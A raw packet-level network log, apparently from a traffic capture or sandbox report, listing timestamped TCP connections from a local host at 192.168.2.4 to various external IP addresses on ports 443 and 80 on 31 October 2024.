Oct 31, 2024 19:19:41.665262938 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.665307045 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.665313005 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.668369055 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.668415070 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.668421984 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.670196056 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.670239925 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.670245886 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.672409058 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.672449112 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.672463894 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.674391031 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.674887896 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.674932957 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.674938917 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.677427053 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.677464962 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.677473068 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.680073023 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.680124044 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.680131912 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.682708025 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.682755947 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.682764053 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.685379028 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.685424089 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.685431004 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.689868927 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.689913988 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.689920902 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.690916061 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.691056013 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.691063881 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.693373919 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.693429947 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.693439007 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.705796003 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.705853939 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.705857038 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.705866098 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.705908060 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.705916882 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.743432999 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.743550062 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:41.743606091 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:41.763108969 CET	51217	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:41.763118982 CET	443	51217	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:41.763876915 CET	51217	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:41.769772053 CET	51217	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:41.769799948 CET	443	51217	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:41.773484945 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:41.773511887 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:41.773562908 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:41.773811102 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:41.773833990 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.218514919 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.218566895 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.220488071 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.220519066 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.220829964 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:42.220856905 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.221890926 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.222007990 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:42.222084045 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.222157955 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.223824978 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:42.223896980 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.224210978 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.224294901 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.224450111 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.224451065 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:42.224457979 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.224472046 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.361663103 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.361665010 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:42.482407093 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.482465982 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.482510090 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.482537985 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.482556105 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.482618093 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.482644081 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.482651949 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.482845068 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.482852936 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.490946054 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.491125107 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.491132975 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.561769009 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.561789036 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.599688053 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.599740028 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.599760056 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.599780083 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.599935055 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.601916075 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.602560043 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.602583885 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.602591038 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.602619886 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.602633953 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.602647066 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.602658987 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:42.602691889 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.602725983 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:42.602725983 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:42.602809906 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:42.603538036 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:42.603580952 CET	443	51196	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:42.603688002 CET	51196	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:42.627131939 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.627465010 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:42.627475977 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.629064083 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.629175901 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:42.629518032 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:42.629518032 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:42.629539013 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.629615068 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.631331921 CET	443	51217	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:42.631665945 CET	51217	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:42.631675959 CET	443	51217	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:42.633166075 CET	443	51217	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:42.633280039 CET	51217	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:42.633606911 CET	51217	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:42.633606911 CET	51217	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:42.633616924 CET	443	51217	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:42.633838892 CET	443	51217	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:42.722177982 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.722240925 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.722424030 CET	51197	443	192.168.2.4	142.250.185.66
Oct 31, 2024 19:19:42.722431898 CET	443	51197	142.250.185.66	192.168.2.4
Oct 31, 2024 19:19:42.736697912 CET	51217	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:42.736705065 CET	443	51217	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:42.752329111 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:42.752341986 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.846035004 CET	51217	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:42.861670971 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:42.875220060 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.875277996 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.875334978 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:42.875346899 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.875391006 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.875442028 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:42.875449896 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.876070023 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.876132011 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:42.876141071 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.883882046 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.883941889 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:42.883951902 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.893662930 CET	443	51217	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:42.992259026 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:42.992373943 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:42.992387056 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:43.014758110 CET	443	51217	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:43.014848948 CET	51217	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:43.021434069 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:43.021545887 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:43.327991962 CET	51218	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:43.328006983 CET	443	51218	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:43.384155035 CET	51217	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:43.384203911 CET	443	51217	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:45.049263954 CET	49731	80	192.168.2.4	104.18.38.233
Oct 31, 2024 19:19:45.049374104 CET	49733	80	192.168.2.4	152.199.19.74
Oct 31, 2024 19:19:45.049705029 CET	49732	80	192.168.2.4	152.199.19.74
Oct 31, 2024 19:19:45.049791098 CET	49730	80	192.168.2.4	172.64.149.23
Oct 31, 2024 19:19:45.054871082 CET	80	49731	104.18.38.233	192.168.2.4
Oct 31, 2024 19:19:45.054934978 CET	49731	80	192.168.2.4	104.18.38.233
Oct 31, 2024 19:19:45.056025028 CET	80	49733	152.199.19.74	192.168.2.4
Oct 31, 2024 19:19:45.056081057 CET	49733	80	192.168.2.4	152.199.19.74
Oct 31, 2024 19:19:45.056123972 CET	80	49732	152.199.19.74	192.168.2.4
Oct 31, 2024 19:19:45.056180000 CET	49732	80	192.168.2.4	152.199.19.74
Oct 31, 2024 19:19:45.057190895 CET	80	49730	172.64.149.23	192.168.2.4
Oct 31, 2024 19:19:45.057261944 CET	49730	80	192.168.2.4	172.64.149.23
Oct 31, 2024 19:19:45.178775072 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:45.178802967 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:45.178863049 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:45.179047108 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:45.179061890 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.026124954 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.026506901 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.026520014 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.027601957 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.027648926 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.027975082 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.028036118 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.028115034 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.071345091 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.235332966 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.235409021 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.265084028 CET	51248	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:46.265109062 CET	443	51248	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:46.265180111 CET	51248	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:46.265383005 CET	51248	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:46.265398026 CET	443	51248	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:46.283786058 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.283848047 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.283899069 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.283919096 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.284007072 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.284040928 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.284041882 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.284053087 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.284082890 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.284087896 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.292278051 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.292331934 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.292337894 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.346111059 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.346120119 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.400783062 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.400834084 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.400840044 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.400850058 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.400892019 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.403414965 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.403801918 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.403846979 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.403858900 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.405009031 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.405042887 CET	443	51244	172.217.16.193	192.168.2.4
Oct 31, 2024 19:19:46.405107975 CET	51244	443	192.168.2.4	172.217.16.193
Oct 31, 2024 19:19:46.905365944 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:46.905383110 CET	443	51249	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:46.905466080 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:46.905643940 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:46.905658007 CET	443	51249	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:47.139683962 CET	443	51248	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:47.140419006 CET	51248	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:47.140440941 CET	443	51248	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:47.140810966 CET	443	51248	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:47.152863979 CET	51248	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:47.152942896 CET	443	51248	142.250.186.33	192.168.2.4
Oct 31, 2024 19:19:47.241086006 CET	51248	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:19:47.777538061 CET	443	51249	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:47.777887106 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:47.777906895 CET	443	51249	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:47.778963089 CET	443	51249	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:47.779058933 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:47.779424906 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:47.779489994 CET	443	51249	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:47.779618025 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:47.779627085 CET	443	51249	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:47.862039089 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:48.041117907 CET	443	51249	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:48.165581942 CET	443	51249	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:48.165664911 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:48.194060087 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:48.194082975 CET	443	51249	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:48.194092989 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:48.195641994 CET	51249	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:54.967420101 CET	51252	80	192.168.2.4	208.95.112.1
Oct 31, 2024 19:19:54.972728014 CET	80	51252	208.95.112.1	192.168.2.4
Oct 31, 2024 19:19:54.974098921 CET	51252	80	192.168.2.4	208.95.112.1
Oct 31, 2024 19:19:54.974211931 CET	51252	80	192.168.2.4	208.95.112.1
Oct 31, 2024 19:19:54.979815960 CET	80	51252	208.95.112.1	192.168.2.4
Oct 31, 2024 19:19:55.618994951 CET	80	51252	208.95.112.1	192.168.2.4
Oct 31, 2024 19:19:55.674715042 CET	51252	80	192.168.2.4	208.95.112.1
Oct 31, 2024 19:19:56.119798899 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.119857073 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.119926929 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.147418022 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.147442102 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.792120934 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.792609930 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.792634964 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.794295073 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.794368982 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.795730114 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.795825005 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.796098948 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.796108961 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.796188116 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.796226978 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.796330929 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.796375036 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.796502113 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.796582937 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.796698093 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.796727896 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797029972 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.797044992 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.797116041 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797127962 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.797149897 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797172070 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.797209978 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797228098 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.797231913 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797250986 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797250986 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797260046 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.797285080 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797297955 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.797339916 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797389030 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.797389984 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797413111 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797454119 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:56.797465086 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797528982 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797554970 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797569990 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797610998 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797631979 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797688007 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797714949 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.797728062 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:56.806701899 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:57.736522913 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:57.736635923 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:57.736677885 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:57.736699104 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:57.736726999 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:57.736768007 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:57.736776114 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:57.736803055 CET	443	51253	162.159.128.233	192.168.2.4
Oct 31, 2024 19:19:57.736845016 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:57.737678051 CET	51253	443	192.168.2.4	162.159.128.233
Oct 31, 2024 19:19:57.738023043 CET	51252	80	192.168.2.4	208.95.112.1
Oct 31, 2024 19:19:57.743495941 CET	80	51252	208.95.112.1	192.168.2.4
Oct 31, 2024 19:19:57.743556023 CET	51252	80	192.168.2.4	208.95.112.1
Oct 31, 2024 19:19:59.298523903 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:19:59.298571110 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:19:59.298635006 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:19:59.299005032 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:19:59.299017906 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.074460030 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.074594975 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.078840017 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.078861952 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.079309940 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.089721918 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.131339073 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.325459003 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.325490952 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.325510979 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.325579882 CET	51254	443	192.168.2.4	13.107.246.45
